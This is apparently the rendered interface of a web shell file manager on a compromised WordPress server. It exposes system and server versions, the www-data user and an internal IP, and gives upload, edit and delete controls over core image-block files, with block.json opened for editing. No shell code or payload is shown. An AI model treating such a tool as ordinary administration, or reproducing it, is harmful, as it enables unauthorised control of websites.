[ SYSTEM ]: Linux wordpress 6.1.0-41-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.158-1 (2025-11-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-includes
/
blocks
/
image
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 block.json
2,984 B
SET
[ EDIT ]
|
[ DEL ]
📄 editor-rtl.css
2,556 B
SET
[ EDIT ]
|
[ DEL ]
📄 editor-rtl.min.css
2,313 B
SET
[ EDIT ]
|
[ DEL ]
📄 editor.css
2,556 B
SET
[ EDIT ]
|
[ DEL ]
📄 editor.min.css
2,313 B
SET
[ EDIT ]
|
[ DEL ]
📄 style-rtl.css
7,690 B
SET
[ EDIT ]
|
[ DEL ]
📄 style-rtl.min.css
6,768 B
SET
[ EDIT ]
|
[ DEL ]
📄 style.css
7,680 B
SET
[ EDIT ]
|
[ DEL ]
📄 style.min.css
6,758 B
SET
[ EDIT ]
|
[ DEL ]
📄 theme-rtl.css
212 B
SET
[ EDIT ]
|
[ DEL ]
📄 theme-rtl.min.css
188 B
SET
[ EDIT ]
|
[ DEL ]
📄 theme.css
212 B
SET
[ EDIT ]
|
[ DEL ]
📄 theme.min.css
188 B
SET
[ EDIT ]
|
[ DEL ]
📄 view.asset.php
84 B
SET
[ EDIT ]
|
[ DEL ]
📄 view.js
12,538 B
SET
[ EDIT ]
|
[ DEL ]
📄 view.min.asset.php
84 B
SET
[ EDIT ]
|
[ DEL ]
📄 view.min.js
4,643 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: block.json
{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/image", "title": "Image", "category": "media", "usesContext": [ "allowResize", "imageCrop", "fixedHeight", "postId", "postType", "queryId" ], "description": "Insert an image to make a visual statement.", "keywords": [ "img", "photo", "picture" ], "textdomain": "default", "attributes": { "blob": { "type": "string", "role": "local" }, "url": { "type": "string", "source": "attribute", "selector": "img", "attribute": "src", "role": "content" }, "alt": { "type": "string", "source": "attribute", "selector": "img", "attribute": "alt", "default": "", "role": "content" }, "caption": { "type": "rich-text", "source": "rich-text", "selector": "figcaption", "role": "content" }, "lightbox": { "type": "object", "enabled": { "type": "boolean" } }, "title": { "type": "string", "source": "attribute", "selector": "img", "attribute": "title", "role": "content" }, "href": { "type": "string", "source": "attribute", "selector": "figure > a", "attribute": "href", "role": "content" }, "rel": { "type": "string", "source": "attribute", "selector": "figure > a", "attribute": "rel" }, "linkClass": { "type": "string", "source": "attribute", "selector": "figure > a", "attribute": "class" }, "id": { "type": "number", "role": "content" }, "width": { "type": "string" }, "height": { "type": "string" }, "aspectRatio": { "type": "string" }, "scale": { "type": "string" }, "sizeSlug": { "type": "string" }, "linkDestination": { "type": "string" }, "linkTarget": { "type": "string", "source": "attribute", "selector": "figure > a", "attribute": "target" } }, "supports": { "interactivity": true, "align": [ "left", "center", "right", "wide", "full" ], "anchor": true, "color": { "text": false, "background": false }, "filter": { "duotone": true }, "spacing": { "margin": true }, "__experimentalBorder": { "color": true, "radius": true, "width": true, "__experimentalSkipSerialization": true, "__experimentalDefaultControls": { "color": true, "radius": true, "width": true } }, "shadow": { "__experimentalSkipSerialization": true } }, "selectors": { "border": ".wp-block-image img, .wp-block-image .wp-block-image__crop-area, .wp-block-image .components-placeholder", "shadow": ".wp-block-image img, .wp-block-image .wp-block-image__crop-area, .wp-block-image .components-placeholder", "filter": { "duotone": ".wp-block-image img, .wp-block-image .components-placeholder" } }, "styles": [ { "name": "default", "label": "Default", "isDefault": true }, { "name": "rounded", "label": "Rounded" } ], "editorStyle": "wp-block-image-editor", "style": "wp-block-image" }